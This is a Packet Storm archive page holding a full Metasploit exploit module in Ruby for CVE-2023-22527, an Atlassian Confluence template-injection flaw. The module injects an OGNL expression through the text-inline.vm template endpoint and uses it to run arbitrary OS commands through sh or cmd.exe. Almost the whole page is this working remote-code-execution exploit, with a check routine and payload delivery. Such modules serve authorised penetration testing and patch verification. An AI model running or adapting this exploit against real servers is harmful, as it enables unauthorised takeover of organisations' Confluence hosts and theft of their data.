what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Atlassian Confluence SSTI Injection

Atlassian Confluence SSTI Injection
Posted Jan 26, 2024
Authored by Spencer McIntyre, Harsh Jaiswal, Rahul Maini | Site metasploit.com

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.

tags | exploit, web
advisories | CVE-2023-22527
SHA-256 | 39194aa16a97418685a42e7cf82542a18f6236bb69aa758c9c1945fa2ea34f1e

Atlassian Confluence SSTI Injection

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Atlassian Confluence SSTI Injection',
'Description' => %q{
This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses
the injection to evaluate an OGNL expression resulting in OS command execution.
Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.
},
'Author' => [
'Rahul Maini', # ProjectDiscovery analysis
'Harsh Jaiswal', # ProjectDiscovery analysis
'Spencer McIntyre'
],
'References' => [
['CVE', '2023-22527'],
['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],
['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']
],
'DisclosureDate' => '2024-01-16', # Atlassian advisory released
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux', 'win'],
'Arch' => [ARCH_CMD],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD
}
],
[
'Windows Command',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Payload' => { 'Space' => 8191, 'DisableNops' => true }
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8090
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def get_confluence_platform
# this method gets the platform by exploiting CVE-2023-22527
return @confluence_platform if @confluence_platform

header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
@org.apache.struts2.ServletActionContext@getResponse().setHeader(
'#{header}',
(@java.lang.System@getProperty('os.name'))
)
OGNL
res = inject_ognl(ognl)
return nil unless res

res.headers[header]
end

def check
confluence_version = get_confluence_version
return CheckCode::Unknown('Failed to determine the Confluence version.') unless confluence_version

vprint_status("Detected Confluence version: #{confluence_version}")
if confluence_version > Rex::Version.new('8.5.3')
return CheckCode::Safe("Version #{confluence_version} is not affected.")
end

confluence_platform = get_confluence_platform
unless confluence_platform
return CheckCode::Safe('Failed to test OGNL injection.')
end

vprint_status("Detected target platform: #{confluence_platform}")
CheckCode::Vulnerable('Successfully tested OGNL injection.')
end

def exploit
confluence_platform = get_confluence_platform
unless confluence_platform
fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')
end

unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
end

print_status("Executing #{payload_instance.refname} (#{target.name})")
execute_command(payload.encoded)
end

def execute_command(cmd, _opts = {})
param = rand_text_alphanumeric(6..10)
# reference a parameter in the OGNL to work around the 200 character length limit
ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
(new freemarker.template.utility.Execute()).exec(
{@org.apache.struts2.ServletActionContext@getRequest().getParameter('#{param}')}
)
OGNL

if target['Platform'] == 'win'
vars_post = { param => "cmd.exe /c \"#{cmd}\"" }
else
# the command is executed via Runtime.exec, so sh -c "#{cmd}" will not work with all payloads
# see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html?m=1
vars_post = { param => "sh -c $@|sh . echo #{cmd}" }
end

inject_ognl(ognl, 'vars_post' => vars_post)
end

def inject_ognl(ognl, opts = {})
opts = opts.clone
param = rand_text_alphanumeric(6..10)
final_opts = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'template/aui/text-inline.vm'),
'vars_post' => {
# label and param are both limited to a 200 character length by default
'label' => "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.#{param},{})+\\u0027",
param => ognl
}.merge(opts.delete('vars_post') || {})
}.merge(opts)

send_request_cgi(final_opts)
end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close